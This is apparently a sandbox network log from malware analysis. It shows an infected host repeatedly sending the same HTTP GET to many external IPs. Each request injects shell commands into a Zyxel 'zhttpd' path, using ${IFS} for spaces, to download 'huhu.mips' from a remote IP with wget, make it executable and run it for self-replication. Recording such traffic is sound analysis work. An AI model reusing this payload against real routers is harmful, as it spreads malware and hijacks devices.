                                                        Feb 2, 2024 06:21:30.343132973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9417192.168.2.143666259.29.174.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343154907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9418192.168.2.1432910152.95.37.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343199968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9419192.168.2.1438474220.97.49.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343255043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9420192.168.2.1442268167.44.250.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343298912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9421192.168.2.1455724107.78.149.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343343973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9422192.168.2.143655887.14.231.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343381882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9423192.168.2.1446640185.80.246.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343415976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9424192.168.2.1455832159.139.10.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343440056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9425192.168.2.14515925.87.155.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343499899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9426192.168.2.1449844218.218.109.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343554974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9427192.168.2.143695463.186.30.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343581915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9428192.168.2.1432778219.74.37.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343614101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9429192.168.2.143645288.44.91.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343663931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9430192.168.2.144901859.80.60.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343717098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9431192.168.2.1442108123.27.254.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343750954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9432192.168.2.1439934188.205.63.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343822956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9433192.168.2.1450102184.136.94.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343828917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9434192.168.2.144636638.37.234.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343880892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9435192.168.2.1435972187.90.84.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343924046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9436192.168.2.145513079.80.60.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343955994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9437192.168.2.145604668.92.14.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.343997002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9438192.168.2.143969872.135.14.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344043016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9439192.168.2.145930024.163.213.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344105005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9440192.168.2.1460738107.20.63.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344122887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9441192.168.2.1450110204.244.154.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344172955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9442192.168.2.146024840.39.231.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344204903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9443192.168.2.1449048110.75.12.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344244957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9444192.168.2.1457820139.125.82.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344284058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9445192.168.2.1457966208.88.171.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344331026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9446192.168.2.1438132216.109.43.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344369888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9447192.168.2.1453546168.29.124.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344397068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9448192.168.2.1443818149.139.86.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344448090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9449192.168.2.144278485.88.196.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344491959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9450192.168.2.1448610191.122.220.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344531059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9451192.168.2.1453500173.227.62.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344567060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9452192.168.2.1438554221.206.60.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344604969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9453192.168.2.1452946156.89.231.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344650984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9454192.168.2.145350247.186.172.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344693899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9455192.168.2.1433742218.60.26.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344747066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9456192.168.2.1437254188.231.201.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344779015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9457192.168.2.1449446158.11.160.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344816923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9458192.168.2.1452510135.47.43.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344854116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9459192.168.2.1445640202.144.8.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344893932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9460192.168.2.1434690170.123.164.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344923973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9461192.168.2.1452272132.205.245.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.344975948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9462192.168.2.1432974102.255.198.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345027924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9463192.168.2.143875286.245.75.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345068932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9464192.168.2.144577023.48.189.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345118046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9465192.168.2.143391874.57.98.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345165014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9466192.168.2.144380090.208.97.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345196962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9467192.168.2.1441832221.196.77.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345237970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9468192.168.2.144667640.15.27.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345279932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9469192.168.2.1449770122.122.204.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345316887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9470192.168.2.144396648.47.192.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345350981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9471192.168.2.146006866.111.244.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345379114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9472192.168.2.145804619.96.177.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345427990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9473192.168.2.1458222145.57.189.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345463991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9474192.168.2.1460212107.233.31.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345506907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9475192.168.2.1451860184.135.176.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345562935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9476192.168.2.1441824221.27.134.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345597029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9477192.168.2.1441890204.67.3.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345638037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9478192.168.2.145081868.136.224.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345679045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9479192.168.2.1441024135.95.95.137443
                                                        TimestampBytes transferredDirectionData
